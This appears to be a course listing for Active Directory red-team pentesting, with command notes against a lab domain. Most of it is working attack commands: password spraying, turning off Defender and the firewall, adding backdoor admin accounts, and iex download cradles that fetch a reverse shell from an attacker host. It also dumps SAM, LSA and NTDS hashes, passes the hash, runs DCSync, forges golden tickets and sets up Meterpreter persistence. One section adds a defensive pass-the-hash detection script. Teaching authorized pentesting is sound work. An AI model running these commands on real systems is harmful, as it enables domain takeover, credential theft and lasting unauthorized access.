Active Directory Pentesting With Kali Linux Red Team Hacking

Attacking and Hacking Active Directory With Kali Linux Full Course - Red Team Hacking Pentesting

Last updated 2022-01-10 | 4.2

What you'll learn

How to Use Metasploit to Exploit Active Directory
How to Use Empire to Exploit Active Directory
How to Use Evil-WinRM to Exploit Active Directory
How to Use CrackMapExec to Exploit Active Directory
How to Exploit Active Directory From Windows
How to Do Active Directory Enumeration
How to do Lateral Movement
Active Directory Post Exploitation
Active Directory Domain Privilege Escalation
Active Directory Persistence Attacks
How to use Kali Linux to hack Active Directory
How to use nmap to Enumerate Servers
How to exploit EternalBlue

Requirements

* How Active Directory works
* Windows Server experience


Course content

11 sections • 105 lectures

windapsearch Preview 19:21

https://github.com/ropnop/windapsearch


LdapDomainDump Preview 15:24

Download it here:

https://github.com/dirkjanm/ldapdomaindump

Enumerating With Enum4Linux Preview 09:04

enum4linux -u ippsec -p Password12345 -a 192.168.1.50

NMAP - Users Preview 06:24

nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ippsec,cn=users,dc=pentesting,dc=local",ldap.password=Password12345,ldap.qfilter=users,ldap.attrib=sAMAccountName' 192.168.1.50 -Pn


nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='pentesting.local' 192.168.1.50 -Pn




GetADUsers.py Preview 08:31

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetADUsers.py

python3 GetADUsers.py -all -dc-ip 192.168.1.50 pentesting.local/ippsec

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/findDelegation.py

python3 findDelegation.py -dc-ip 192.168.1.50 pentesting.local/ippsec

python3 GetUserSPNs.py -dc-ip 192.168.1.50 pentesting.local/ippsec

CrackMapExec Intro Preview 08:53

https://github.com/byt3bl33d3r/CrackMapExec

CrackMapExec - Password Spraying Preview 12:37

Bruteforcing examples

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --no-bruteforce


crackmapexec <protocol> <target(s)> -u username1 username2 -p password1


crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords


crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes

CrackMapExec - ENUM 1.1 Preview 09:49

Enumerate shares and access

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --shares

Enumerate active sessions

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345  --sessions

Enumerate disks

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345  --disks

Enumerate logged on users

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --loggedon-users

Enumerate domain users

crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --users

CrackMapExec - ENUM 1.2 Preview 09:41

python3 crackmapexec.py smb 192.168.1.50 -u 'ippsec' -p 'Password12345' --users

Enumerate users by bruteforcing RID

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute

Enumerate domain groups

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups

Enumerate local groups

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups

Obtain domain password policy

cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol


CrackMapExec - Command Execution Preview 13:35

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'ipconfig'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami /groups'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableRealtimeMonitoring $true'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableIOAVProtection $true'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall show allprofiles'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall set allprofiles state off'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Invoke-WebRequest -Uri "http://192.168.1.223:8000/users.txt" -OutFile "c:\Users\ippsec\Desktop\user.txt"'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'dir c:\Users\ippsec\Desktop'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'type c:\Users\ippsec\Desktop\user.txt'


crackmapexec - Command execution + Using Local Auth Preview 12:11

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345  -x 'net user /add admin Password12345'

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345  -x 'net user'

#Add to Administrator Group

crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345  -x 'net localgroup administrators admin /add'

crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345  -x 'net localgroup administrators'

crackmapexec winrm 192.168.215.138 -u admin -p Password12345 --local-auth

Get PowerShell Reverse Shell Preview 11:26

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcpOneLine.ps1

mv Invoke-PowerShellTcpOneLine.ps1 invoke.ps1

nc -lvp 1234

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'

Dumping SAM Preview 05:36

SAM is short for the Security Account Manager, which manages all the local user accounts and their passwords; it acts as a database. Passwords are hashed and then stored in the SAM. It is the responsibility of the LSA (Local Security Authority) to verify user logins by matching the supplied password against the hashes held in the SAM. The SAM starts running in the background as soon as Windows boots. The SAM file is found in C:\Windows\System32\config, and the hashed passwords saved in it can also be reached through the registry: open the Registry Editor and navigate to HKEY_LOCAL_MACHINE\SAM.

crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --sam

ls ~/.cme/logs/

Dumping LSA + PTH with CME Preview 16:43

sudo crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --lsa


#Where the dumps are stored

ls ~/.cme/logs/


Cracking with John (the dumped hashes are saved in the file named hash)

john --format=NT hash

john --format=NT hash --show

john --format=NT  --wordlist=/home/user/Desktop/rockyou.txt hash


crackmapexec winrm 192.168.1.54 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'

#against the domain controller (192.168.1.50), too

crackmapexec winrm 192.168.1.50 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'


#Dump the entire NTDS database (all domain NTLM hashes) with --ntds

sudo crackmapexec smb 192.168.1.50 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da --ntds

pth-winexe and xfreerdp Preview 10:07

pth-winexe -U pentesting/

pth-winexe

apt-get update

apt-get install freerdp-x11

xfreerdp /u:ippsec /d:win2012 /pth: /v:192.168.1.54


CrackMapExec Modules Preview 13:40

crackmapexec smb -L

crackmapexec smb -M mimikatz --options

sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345

sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345 --server-port 81

Module output is saved here:

ls /root/.cme/logs/

CrackMapExec CMEDB Preview 06:48

#start the database

cmedb

help

proto smb

help

creds

sudo crackmapexec smb 192.168.1.50 -id 2

sudo crackmapexec smb 192.168.1.50 -id 3

BloodHound Installation Preview 20:40

Install Java:

echo "deb http://httpredir.debian.org/debian stretch-backports main" | sudo tee -a /etc/apt/sources.list.d/stretch-backports.list

sudo apt-get update


Install Neo4j

  1. Add the neo4j repo to your apt sources:

wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -

echo 'deb https://debian.neo4j.com stable 4.0' | sudo tee /etc/apt/sources.list.d/neo4j.list

sudo apt-get update

  2. Install apt-transport-https with apt:

sudo apt-get install apt-transport-https

  3. Install neo4j community edition using apt:

sudo apt-get install neo4j


  4. Stop neo4j:

sudo systemctl stop neo4j


  5. Start neo4j (either in the foreground or as a service):

cd /usr/bin

./neo4j console

sudo systemctl start neo4j


Open a web browser and navigate to https://localhost:7474/.

You should see the neo4j web console.

  1. Authenticate to neo4j in the web console with username neo4j, password neo4j.

  2. You’ll be prompted to change this password.


Download the BloodHound GUI

  1. Download the latest version of the BloodHound GUI from https://github.com/BloodHoundAD/BloodHound/releases

  2. Unzip the folder, then run BloodHound with the --no-sandbox flag:

./BloodHound.bin --no-sandbox

https://bloodhound.readthedocs.io/en/latest/installation/linux.html

BADDD No AUDIO Getting Shells with CrackMapExec Preview 08:50

sudo msfconsole

use exploit/multi/handler

set LHOST 192.168.1.223 <-- local Machine

set LPORT 470


python3 -m http.server

crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'


Basic commands Preview 06:15

AMSI (AntiMalware Scan Interface)

Windows AMSI is integrated into the following components:

  • PowerShell (scripts, interactive use, and dynamic code evaluation)
  • PowerShell ISE (Windows PowerShell IDE)
  • Windows Script Host (wscript.exe and cscript.exe) (scripts and dynamic code evaluation)
  • User Account Control (UAC) (using a different type of AMSI provider)
  • Office 365 (JavaScript/VBA)
  • Office 365 (documents)
  • .NET Framework 4.8 (scanning of all assemblies)
  • Windows Management Instrumentation (WMI)


Upload and Download Preview 04:30

upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.

  • usage: upload local_path remote_path

download: it is not needed to set local_path if the remote file is in the current directory.

  • usage: download remote_path local_path

services: list all services. No administrator permissions needed.

PowerView.ps1 Preview 07:20

iex(new-object net.webclient).downloadstring('http://192.168.1.223:8000/PowerView.ps1')

Build SharpSploit - Enumeration Preview 06:11

Dll-Loader -http -path http://192.168.1.223:8000/SharpSploit.dll

menu

[SharpSploit.

[SharpSploit.Enumeration.Net]::GetNetLocalGroupMembers()

[SharpSploit.Enumeration.Net]::GetNetLocalGroups()

[SharpSploit.Enumeration.Net]::GetNetLoggedOnUsers()

[SharpSploit.Enumeration.Net]::GetNetSessions()

[SharpSploit.Enumeration.Net]::GetNetShares()


User, Group, and Network Preview 00:29

User Enumeration

Get current username

echo %USERNAME% || whoami

$env:username

List user privilege

whoami /priv

whoami /groups

List all users

net user

whoami /all

Get-LocalUser | ft Name,Enabled,LastLogon

Get-ChildItem C:\Users -Force | select Name

List logon requirements; useable for bruteforcing

net accounts

Get details about a user (i.e. administrator, admin, current user)

net user administrator

net user admin

net user %USERNAME%

List all local groups

net localgroup

Get-LocalGroup | ft Name

Get details about a group (i.e. administrators)

net localgroup administrators

Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource


Network Enumeration

List all network interfaces, IP, and DNS.

ipconfig /all

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

Get-DnsClientServerAddress -AddressFamily IPv4 | ft

List current routing table

route print

Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

List the ARP table

arp -a

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

List all current connections

netstat -ano

List firewall state and current configuration

netsh advfirewall firewall dump

netsh firewall show state

netsh firewall show config

List firewall's blocked ports

$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports

Disable firewall

netsh firewall set opmode disable

netsh advfirewall set allprofiles state off

List all network shares

net share

SNMP Configuration

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

OS, AV, and Configuration Preview 00:54

Tools - Local Priv Esc Preview 01:03

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

Sherlock and Watson Preview 07:10

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

https://github.com/rasta-mouse/Sherlock

https://github.com/rasta-mouse/Watson

CVE-2019-1388 Preview 07:37

SEImpersonate Preview 10:19

Unquoted Service Path Preview 19:03

Windows - Privilege Escalation and Local Enumeration Cheat Sheet Preview 00:00

Recommended Windows Hack The Box machines Preview 00:09

Basics and Installing Preview 11:41

https://github.com/BC-SECURITY/Empire

sudo apt install powershell-empire

sudo powershell-empire

Getting a Shell + CME + Powershell Preview 07:10

https://alpinesecurity.com/blog/empire-a-powershell-post-exploitation-tool/

Getting a shell + Evil-WinRM + Bat File Preview 11:22

Listeners

help

uselistener http

info <- displays all the options that you can tweak

set BindIP to Kali's IP address

set Port to any port number other than 80

execute


https://www.youtube.com/watch?v=52xkWbDMUUM&ab_channel=HackerSploit

Privilege Escalation 1 - Reverse Shell With Unquoted Path Preview 25:33

Privilege Escalation 2 - Stager with NT/SYSTEM Preview 06:04

Privilege Escalation 3 Preview 11:06

net user raba Password123 /add

net localgroup administrators raba /add

net localgroup "Remote Management Users" raba /add

remove old

Elevated with Empire - Mimikatz and pth Preview 08:39

Pth + dcsync + dcshadow -1 Preview 15:02

Troubleshooting Empire Pth + dcsync + dcshadow - 2 Preview 15:10

Failed to get + dcsync + dcshadow - 3 Preview 04:39

Getting Shell with JenkinsAdmin Preview 06:38

evil-winrm -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -i 192.168.1.50

upload /tmp/launcher.bat C:\Users\jenkinsadmin\Documents\launcher.bat

C:\Users\jenkinsadmin\Documents\launcher.bat

Finally Getting Dcsync + Persistent Preview 06:28



Intro Preview 12:45

Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit, what payload to drop, and hit Enter.

Exploiting EternalBlue with Metasploit Preview 09:24

Check if it is exploitable:

use exploit/windows/smb/ms17_010_psexec

set rhosts 192.168.1.53

set smbpass Password123

set smbuser student1

set smbdomain pentesting.local

set payload windows/meterpreter/reverse_tcp

run


Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

Enumeration 1 - User, Groups, Computers Preview 12:23

use auxiliary/gather/kerberos_enumusers

sysinfo

ps

post/windows/gather/enum_ad_users

post/windows/gather/enum_domain_group_users

post/windows/gather/enum_logged_on_users

post/windows/gather/enum_ad_user_comments

post/windows/gather/enum_domain_group_users

post/windows/gather/enum_domain

post/windows/gather/enum_computers

post/windows/gather/resolve_sid

run post/windows/gather/enum_ad_computers

post/windows/gather/local_admin_search_enum

post/windows/gather/enum_ad_service_principal_names


Enumeration 2 - Arp, Tokens, Patches Preview 11:22

run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

ipconfig

netstat

route

#Windows Gather Enumerate Domain Admin Tokens (T

post/windows/gather/enum_tokens

post/windows/gather/enum_patches

post/windows/gather/credentials/winscp

#Windows Gather Powershell Environment Setting E

post/windows/gather/enum_powershell_env

post/windows/gather/enum_ie

post/windows/gather/bloodhound


for More

search post/windows/gather/


Enumeration 3 - Shares, SMB, and More Preview 09:47

use post/windows/gather/enum_shares

use post/windows/gather/enum_services

use post/windows/gather/enum_snmp

use post/windows/gather/enum_chrome

use post/windows/gather/enum_av_excluded

use post/windows/gather/enum_putty_saved_sessions

use post/windows/gather/enum_applications

use post/windows/gather/win_privs

use post/windows/gather/forensics/browser_history

for more:

search post/windows/gather/

Exploit Suggester Preview 08:51


LOCAL_EXPLOIT_SUGGESTER

run post/multi/recon/local_exploit_suggester

post/windows/gather/win_privs

Exploit Suggester 2 Preview 10:26

Back door add user Preview 07:19

post/windows/manage/add_user

set addtogroup true

set username test

set group administrators

set session 2

post/windows/manage/delete_user

HashDump With Metasploit Preview 06:28

search hashdump

search credential_collector

post/windows/gather/hashdump

post/windows/gather/credentials/credential_collector

meterpreter > load kiwi

meterpreter > help


Testing Credentials

crackmapexec smb 192.168.1.50 192.168.1.55 -u ippsec -p Password123!

Lateral Movement - PTH With metasploit Preview 14:40

https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/

Pass the Hash with psexec: all this needs is the NTLM hash of a privileged user, which is exactly what we obtained earlier with Mimikatz.


  • use exploit/windows/smb/psexec

    • set SMBDomain pentesting.local

    • set smbuser ippsec

    • set SMBPass e52cac67419a9a22c17ec4fe2a5374cb:2b576acbe6bcfda7294d6bd18041b8fe

    • set rhosts 192.168.1.55

    • set lport 4457

options

load kiwi

creds_msv

00000000000000000000000000000000

see if user is part of Domain Users

use post/windows/gather/enum_domain_group_users

Lateral Movement To DC - Metasploit Preview 11:42


  • use exploit/windows/smb/psexec

    • set SMBDomain pentesting.local

    • set smbuser s4vitar

    • set SMBPass 00000000000000000000000000000000:58a478135a93ac3bf058a5ea0e8fdb71

    • set rhosts 192.168.1.50

    • set lport 4457

options

load kiwi

creds_msv

00000000000000000000000000000000

see if user is part of Domain Users

use post/windows/gather/enum_domain_group_users


use post/windows/gather/credentials/domain_hashdump

scanner/smb/impacket/secretsdump

Steal_Token and Dumping All Hashes - Metasploit Preview 05:58

The Metasploit Framework includes an extension called incognito that allows token stealing and manipulation. These activities matter in the privilege escalation stage of a penetration test because, if we can steal the token of an administrator, we can perform higher-privilege operations on the target.

use post/windows/gather/credentials/domain_hashdump

use incognito

list_tokens -u

impersonate_token PENTESTING\\Administrator

DcSync With Metasploit Preview 04:55

From Domain Controller

meterpreter > use incognito

meterpreter > impersonate_token PENTESTING\\Administrator

meterpreter > load kiwi

meterpreter > help

meterpreter > kiwi_cmd '"lsadump::dcsync /user:Administrator"'

meterpreter > kiwi_cmd '"lsadump::dcsync /user:krbtgt"'

Golden Ticket With Metasploit Preview 07:17

use post/windows/escalate/golden_ticket


Golden Ticket attacks can be carried out against Active Directory domains, where access control is implemented using Kerberos tickets issued to authenticated users by a Key Distribution Service.

The attacker gains control over the domain’s Key Distribution Service account (KRBTGT account) by stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets (TGTs) for any account in the Active Directory domain.

With valid TGTs, the attacker can request access to any resource/system on its domain from the Ticket Granting Service (TGS).

Because the attacker controls the component of the access control system responsible for issuing Ticket Granting Tickets (TGTs), he effectively holds a golden ticket to any resource in the domain.

kerberos_ticket_list

kerberos_ticket_use /root/.msf4/loot/20210501011013_default_192.168.1.50_golden.ticket_888290.bin

BACKDOOR METERPRETER SERVICE 1 Preview 05:30

After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system for later use. This way, if the service you initially exploited is down or patched, you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that will be available to you even if the remote system is rebooted.

meterpreter > run persistence -h

meterpreter > run persistence -U -i 5 -p 4458 -r 192.168.1.223

meterpreter > exit


use exploit/multi/handler

set PAYLOAD windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.1.223

set LPORT 4458

exploit

When a user logs in to the remote system, a Meterpreter session is opened up for us.


BACKDOOR METERPRETER SERVICE 2 Preview 01:28

Intro Domain Enumeration Preview 00:39

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

Domain User Enumeration Preview 13:41

Domain Group Enumeration Preview 10:54

Domain Computer/Servers Enumeration Preview 07:10

PowerView - GPO and OU Preview 12:42

Domain Shares Enumeration Preview 10:39

PowerView - ACL Preview 20:55

Active Directory Recon Preview 08:58

BloodHound Installation Preview 16:31

BloodHound Basics Preview 17:38

Domain Enumeration Cheat Sheet - PowerView Preview 00:00

Intro to Lateral Movement - RDP Preview 01:01

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

How Kerberos Work Preview 00:00

Dumping SAM and SYSTEM For Offline Cracking Preview 11:55

SAM & LSA with MimiKatz Preview 08:26

PassTheHash with MimiKatz Preview 17:22

A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication, and potentially for lateral access to other networked systems. The threat actor does not need to crack the hash to obtain a plaintext password. PtH attacks exploit the authentication protocol, because the password hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system's active memory, among other techniques.
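From the defender's side, the static-hash property described above is what makes PtH detectable. The following Python is an added example (not part of the course material) that scans constructed, simplified Security-log 4624 records for two indicators: a Logon Type 9 logon with logon process seclogo and package Negotiate on the source host, and one account fanning out over NTLM network logons to several hosts within a short window. The key=value log format and all hostnames, users and addresses are constructed for the example.

```python
"""Pass-the-hash detection sketch over constructed Windows 4624 logon records.

Indicators checked (field names follow Event ID 4624, log lines are constructed):
  1. Logon Type 9 (NewCredentials) + Logon Process 'seclogo' + Package 'Negotiate':
     the trace left on the source host when a stolen NTLM hash is injected
     into a fresh logon session.
  2. One (account, source IP) pair authenticating with NTLM (Logon Type 3)
     to many distinct hosts inside a sliding time window: lateral movement
     with a hash that never changes between sessions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events, one per line, key=value pairs separated by spaces.
SAMPLE_EVENTS = """\
time=2022-01-10T10:00:01 host=WS01 id=4624 user=ippsec logon_type=2 proc=User32 pkg=Negotiate src=-
time=2022-01-10T10:05:12 host=WS01 id=4624 user=jenkinsadmin logon_type=9 proc=seclogo pkg=Negotiate src=-
time=2022-01-10T10:05:40 host=SRV01 id=4624 user=jenkinsadmin logon_type=3 proc=NtLmSsp pkg=NTLM src=192.168.1.54
time=2022-01-10T10:05:55 host=SRV02 id=4624 user=jenkinsadmin logon_type=3 proc=NtLmSsp pkg=NTLM src=192.168.1.54
time=2022-01-10T10:06:10 host=DC01 id=4624 user=jenkinsadmin logon_type=3 proc=NtLmSsp pkg=NTLM src=192.168.1.54
time=2022-01-10T11:30:00 host=SRV01 id=4624 user=ippsec logon_type=3 proc=Kerberos pkg=Kerberos src=192.168.1.60
"""


def parse_events(text):
    """Turn key=value lines into dicts; 'time' becomes a datetime."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = dict(kv.split("=", 1) for kv in line.split())
        fields["time"] = datetime.fromisoformat(fields["time"])
        events.append(fields)
    return events


def find_pth_logons(events):
    """Indicator 1: return (host, user) for seclogo NewCredentials logons."""
    return [
        (e["host"], e["user"])
        for e in events
        if e["id"] == "4624" and e["logon_type"] == "9"
        and e["proc"].lower() == "seclogo" and e["pkg"] == "Negotiate"
    ]


def find_ntlm_fanout(events, min_hosts=3, window=timedelta(minutes=10)):
    """Indicator 2: (user, src, hosts) where one account reaches >= min_hosts
    distinct hosts over NTLM network logons within `window`."""
    by_key = defaultdict(list)
    for e in events:
        if e["id"] == "4624" and e["logon_type"] == "3" and e["pkg"] == "NTLM":
            by_key[(e["user"], e["src"])].append((e["time"], e["host"]))
    hits = []
    for (user, src), logons in by_key.items():
        logons.sort()
        for i, (t0, _) in enumerate(logons):
            hosts = {h for t, h in logons[i:] if t - t0 <= window}
            if len(hosts) >= min_hosts:
                hits.append((user, src, sorted(hosts)))
                break  # one alert per (user, src) is enough
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    print("PtH source indicators:", find_pth_logons(evs))
    print("NTLM fan-out:", find_ntlm_fanout(evs))
```

Thresholds such as three hosts in ten minutes are tuning knobs for the environment, not fixed rules; the Type 9/seclogo indicator is the higher-confidence signal of the two.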

Passing the ticket Preview 15:16

In a pass-the-ticket attack, an attacker extracts a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on one system and then uses it on another system to request Kerberos service tickets (TGS) and gain access to network resources.


One primary difference between pass-the-hash and pass-the-ticket is that Kerberos TGTs expire (10 hours by default), whereas NTLM hashes only change when the user changes their password. A TGT must therefore be used within its lifetime, or renewed to extend it (up to 7 days).

Pass the ticket with Rubeus Preview 08:07

Session Hijack Preview 04:46

SMB Relay Attack Preview 08:10

10 ways to get dump files Preview 00:00

Intro - Domain Privilege Escalation Preview 00:53

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

ACL - GenericAll on Group Preview 11:45

Priv Esc – DNSAdmins Preview 22:20

dcsync Preview 19:19

Unconstrained delegation - Computer Preview 15:22

constrained Delegation - Computer Preview 14:52

ACL - GenericWrite on User Preview 12:18

SET-SPN - Kerberoast Preview 15:25

Targeted Kerberoasting - AS-REPs - FINDING Preview 11:30

Targeted Kerberoasting - AS-REPs - SET Preview 12:36

Intro Domain Persistence and Dominance - RDP Preview 00:57

https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg

DSRM Preview 12:24

DCShadow - Change Attribute Preview 07:16

DCShadow - SIDHistory Preview 08:41

DCShadow - hash Preview 15:00

Golden Ticket Preview 14:43

Silver Ticket Preview 11:29

AdminSDHolder - Adding Permission Preview 14:28

AdminSDHolder - Abusing Permission Preview 11:39

ZeroLogon -- Do This Last Preview 07:12